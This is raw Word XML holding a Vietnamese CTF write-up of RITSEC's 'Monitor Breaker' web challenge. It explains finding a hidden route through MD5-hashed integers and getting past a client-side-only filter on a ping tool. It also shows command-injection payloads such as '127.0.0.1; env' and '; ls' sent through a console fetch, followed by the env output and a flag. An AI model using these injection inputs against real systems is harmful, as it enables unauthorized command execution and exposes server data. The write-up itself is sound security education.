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43BA4" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="400" w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BA5" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00FF88"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>CTF WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BA6" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BA7" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Monitor Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BA8" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BA9" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="AAAAAA"/>
        </w:rPr>
        <w:t>RITSEC CTF  |  Web Exploitation  |  415 Doubloons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BAA" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BAB" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFAA00"/>
        </w:rPr>
        <w:t>Vulnerability: Command Injection (OS Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BAC" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BAD" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00FF88"/>
        </w:pBdr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BAE" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="400" w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BAF" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Thông Tin Bài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5C5" w14:paraId="25B43B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AA44"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="00AA44"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="00AA44"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="00AA44"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0D213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B43BB0" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tên bài:       Monitor Breaker</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BB1" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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m:          415 Doubloons</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BB2" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto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i:          Web Exploitation / Command Injection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BB3" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto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n:       RITSEC CTF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BB4" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
            <w:pPr>
              <w:spacing w:line="260" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flag:          RS{1_br0k3_17_e6ebced80740d006889f26ceeeee666b}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43BB6" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BB7" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Đ</w:t>
      </w:r>
      <w:r>
        <w:t>ề</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bài mô t</w:t>
      </w:r>
      <w:r>
        <w:t>ả</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"A maintenance interface leaked into production. Your job: interact with the system monitors and extract the flag from this broken console."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BB8" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BB9" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Phân Tích Đ</w:t>
      </w:r>
      <w:r>
        <w:t>ề</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BBA" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Trang Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BBB" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Trang ch</w:t>
      </w:r>
      <w:r>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là m</w:t>
      </w:r>
      <w:r>
        <w:t>ộ</w:t>
      </w:r>
      <w:r>
        <w:t>t System Admin Portal v</w:t>
      </w:r>
      <w:r>
        <w:t>ớ</w:t>
      </w:r>
      <w:r>
        <w:t>i 3 m</w:t>
      </w:r>
      <w:r>
        <w:t>ụ</w:t>
      </w:r>
      <w:r>
        <w:t>c đi</w:t>
      </w:r>
      <w:r>
        <w:t>ề</w:t>
      </w:r>
      <w:r>
        <w:t>u hư</w:t>
      </w:r>
      <w:r>
        <w:t>ớ</w:t>
      </w:r>
      <w:r>
        <w:t>ng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BBC" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BBD" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Health</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ch</w:t>
      </w:r>
      <w:r>
        <w:t>ỉ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> có </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00AA44"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onclick="alert('This section is under maintenance')"</w:t>
      </w:r>
      <w:r>
        <w:t>, không có href → b</w:t>
      </w:r>
      <w:r>
        <w:t>ị</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BBE" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance Monitor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00AA44"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/_sys/c4ca4238a0b923820dcc509a6f75849b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BBF" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00AA44"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/_sys/c81e728d9d4c2f636f067f89cc14862c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BC0" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BC1" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.2 Phát Hi</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t>n Pattern MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BC2" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Hai đư</w:t>
      </w:r>
      <w:r>
        <w:t>ờ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 hash MD5 c</w:t>
      </w:r>
      <w:r>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:t>a s</w:t>
      </w:r>
      <w:r>
        <w:t>ố</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nguyên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BC3" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C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5C5" w14:paraId="25B43B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B43BC4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MD5("1") = c4ca4238a0b923820dcc509a6f75849b  →  /_sys/.../  (Performance Monitor)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BC5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MD5("2") = c81e728d9d4c2f636f067f89cc14862c  →  /_sys/.../  (System Logs)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BC6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MD5("0") = cfcd208495d565ef66e7dff9f98764da  →  /_sys/.../  (Network Health - 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Ẩ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N!)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43BC8" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BC9" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> truy c</w:t>
      </w:r>
      <w:r>
        <w:t>ậ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">p route </w:t>
      </w:r>
      <w:r>
        <w:t>ẩ</w:t>
      </w:r>
      <w:r>
        <w:t>n v</w:t>
      </w:r>
      <w:r>
        <w:t>ớ</w:t>
      </w:r>
      <w:r>
        <w:t>i MD5("0"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BCA" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C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5C5" w14:paraId="25B43B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B43BCB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https://&lt;instance&gt;/_sys/cfcd208495d565ef66e7dff9f98764da</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43BCD" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BCE" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t qu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ả</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tìm th</w:t>
      </w:r>
      <w:r>
        <w:t>ấ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y trang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Ping Tool</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BCF" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BD0" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Khai Thác L</w:t>
      </w:r>
      <w:r>
        <w:t>ỗ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> H</w:t>
      </w:r>
      <w:r>
        <w:t>ổ</w:t>
      </w:r>
      <w:r>
        <w:t>ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC8264" w14:textId="5ACCC88A" w:rsidR="003B6C9C" w:rsidRDefault="003B6C9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="003B6C9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D36477F" wp14:editId="356D4B26">
            <wp:extent cx="5943600" cy="3326765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="152041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413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3BD1" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Trang Network Ping Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BD2" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Trang cho phép nh</w:t>
      </w:r>
      <w:r>
        <w:t>ậ</w:t>
      </w:r>
      <w:r>
        <w:t>p đ</w:t>
      </w:r>
      <w:r>
        <w:t>ị</w:t>
      </w:r>
      <w:r>
        <w:t>a ch</w:t>
      </w:r>
      <w:r>
        <w:t>ỉ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv4 và ping. Tuy nhiên, khi đ</w:t>
      </w:r>
      <w:r>
        <w:t>ọ</w:t>
      </w:r>
      <w:r>
        <w:t>c source code JS c</w:t>
      </w:r>
      <w:r>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:t>a trang:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BD3" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C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5C5" w14:paraId="25B43B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B43BD4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lastRenderedPageBreak/>
              <w:t>// Filter CH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Ỉ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ở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client-side — không có b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ả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o v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ệ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phía server!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BD5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targetInput.addEventListener('input', e =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BD6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targetInput.value = targetInput.value.replace(/[a-zA-Z]/g, '');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BD7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inputWarning.textContent = '';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BD8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});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43BDA" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BDB" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ỗ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ổ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ng: </w:t>
      </w:r>
      <w:r>
        <w:t>Filter ch</w:t>
      </w:r>
      <w:r>
        <w:t>ỉ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ch</w:t>
      </w:r>
      <w:r>
        <w:t>ạ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r>
        <w:t>ở</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phía client (browser). Có th</w:t>
      </w:r>
      <w:r>
        <w:t>ể</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bypass b</w:t>
      </w:r>
      <w:r>
        <w:t>ằ</w:t>
      </w:r>
      <w:r>
        <w:t>ng cách g</w:t>
      </w:r>
      <w:r>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:t>i POST request tr</w:t>
      </w:r>
      <w:r>
        <w:t>ự</w:t>
      </w:r>
      <w:r>
        <w:t>c ti</w:t>
      </w:r>
      <w:r>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:t>p qua DevTools Console, hoàn toàn b</w:t>
      </w:r>
      <w:r>
        <w:t>ỏ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qua validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BDC" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BDD" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Bypass Client-Side Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BDE" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>ở</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F12 → Console và g</w:t>
      </w:r>
      <w:r>
        <w:t>ử</w:t>
      </w:r>
      <w:r>
        <w:t>i request th</w:t>
      </w:r>
      <w:r>
        <w:t>ủ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BDF" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C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5C5" w14:paraId="25B43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B43BE0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const fd = new FormData();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BE1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fd.append('target', '127.0.0.1; env');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BE2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const res = await fetch('/_sys/cfcd208495d565ef66e7dff9f98764da', {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BE3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method: 'POST',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BE4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body: fd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BE5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});</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BE6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const data = await res.json();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BE7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console.log(data.output);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43BE9" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BEA" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Ki</w:t>
      </w:r>
      <w:r>
        <w:t>ể</w:t>
      </w:r>
      <w:r>
        <w:t>m Tra Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BEB" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Output l</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t>nh env ti</w:t>
      </w:r>
      <w:r>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:t>t l</w:t>
      </w:r>
      <w:r>
        <w:t>ộ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thông tin h</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r>
        <w:t>ố</w:t>
      </w:r>
      <w:r>
        <w:t>ng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BEC" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C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5C5" w14:paraId="25B43B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B43BED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KUBERNETES_SERVICE_PORT=443</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BEE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HOSTNAME=monitor-breaker-7126c5c1-073f-4495-87c0-e8cfca19bf32-1-64klx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BEF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OPENSHIFT_BUILD_NAMESPACE=ritsec-ctf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BF0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FLASK_APP=app.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BF1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PWD=/app</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BF2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FLAG=          &lt;-- Tr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ố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ng! Flag không n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ằ</w:t>
            </w:r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m trong env</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BF3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/bin/sh: 1: ping: not found</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B43BF5" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BF6" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Flag trong bi</w:t>
      </w:r>
      <w:r>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:t>n môi trư</w:t>
      </w:r>
      <w:r>
        <w:t>ờ</w:t>
      </w:r>
      <w:r>
        <w:t>ng b</w:t>
      </w:r>
      <w:r>
        <w:t>ị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ng. C</w:t>
      </w:r>
      <w:r>
        <w:t>ầ</w:t>
      </w:r>
      <w:r>
        <w:t>n tìm trong filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BF7" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BF8" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Screenshot: K</w:t>
      </w:r>
      <w:r>
        <w:t>ế</w:t>
      </w:r>
      <w:r>
        <w:t>t Qu</w:t>
      </w:r>
      <w:r>
        <w:t>ả</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BF9" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25B43C31" wp14:editId="25B43C32">
            <wp:extent cx="5715000" cy="3619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3BFA" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B43BFB" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.5 Li</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t>t Kê File Trong /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BFC" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="00F35FF2">
      <w:r>
        <w:t>Dùng l</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t>nh ls đ</w:t>
      </w:r>
      <w:r>
        <w:t>ể</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> li</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t>t kê thư m</w:t>
      </w:r>
      <w:r>
        <w:t>ụ</w:t>
      </w:r>
      <w:r>
        <w:t>c hi</w:t>
      </w:r>
      <w:r>
        <w:t>ệ</w:t>
      </w:r>
      <w:r>
        <w:t>n t</w:t>
      </w:r>
      <w:r>
        <w:t>ạ</w:t>
      </w:r>
      <w:r>
        <w:t>i (PWD=/app):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43BFD" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C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5C5" w14:paraId="25B43C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B43BFE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fd.append('target', '127.0.0.1; ls');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43BFF" w14:textId="77777777" w:rsidR="001945C5" w:rsidRDefault="001945C5"/>
          <w:p w14:paraId="25B43C00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// Output:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B43C01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app.py</w:t>
            </w:r>
          </w:p>
